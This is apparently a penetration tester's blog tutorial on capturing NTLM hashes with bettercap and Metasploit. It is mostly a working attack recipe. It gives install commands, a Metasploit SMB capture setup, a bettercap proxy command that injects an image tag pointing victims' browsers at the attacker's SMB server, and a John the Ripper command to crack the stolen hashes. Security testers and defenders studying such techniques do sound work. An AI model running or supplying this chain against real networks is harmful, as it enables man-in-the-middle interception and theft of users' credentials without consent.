Capturing NTLM Hashes using Bettercap

December 12, 2018

Recently during an engagement, while I was performing an internal network assessment, I figured out that responder was not able to capture the hashes. Initially I thought that this might be due to some issue with the responder configuration or the options that I am using. After fiddling with it for a while, I started searching on capture NTLM hashes over the internet. I found some good links to use bettercap and thought of putting it down for my own reference.

Bettercap is a Swiss army knife for network attacks and monitoring[1]. I used the proxy module to inject a HTML code which shall point to my SMB Capture server. Before starting, lets get our environment ready. The following tutorial is tested on Kali Linux and Parrot OS.

# apt-get update
# apt-get install ruby-dev libpcap-dev build-essentials
# gem install bettercap

Assuming, you have metasploit already installed and updated, open the metasploit console using the msfconsole command.

# msfconsole

Once the console is open, type in the following commands in the console.

msf> use auxiliary/server/capture/smb
msf auxiliary (server/capture/smb) > set JOHNPWFILE /path/to/john/password/capture/file
msf auxiliary (server/capture/smb) > run

Once the auxiliary is running, verify it by typing the following command. You should see your auxiliary running as a job in the background.

msf auxiliary(server/capture/smb) > jobs

Now, open another terminal and run the bettercap proxy module to redirect any user on the network browsing for HTTP urls to be redirected to your server.

# bettercap --proxy --proxy-module injecthtml --html-data "<img src='file://<YOUR_MSF_SERVER_IP>/test/random.jpg' />"

You can also specify a specific target by giving -t <TARGET_IP_ADDRESS> with the above command or redirect all users to your proxy. Bettercap will start running and you will see when it injects the HTML code into the requested URL. If the user is using a vulnerable browser such as Internet Explorer or Edge, which by default authenticates the user using his / her NTLM credentials over SMB, you will be able to capture the user’s hash in your metasploit console as well as the file that we had earlier set in JOHNPWFILE. Once we have enough number of hashes to crack, we can run the following command in a new terminal window.

# john /path/to/john/password/capture/file -w /path/to/your/wordlist/file

If you have a strong and decent wordlist file and the password is guessable, john should let you know in a while.

P.S. The steps mentioned above are available over the internet and the links to these steps are provided in the description. The credits for the steps are with the original authors and I just intent to create a reference out of these steps in this blog.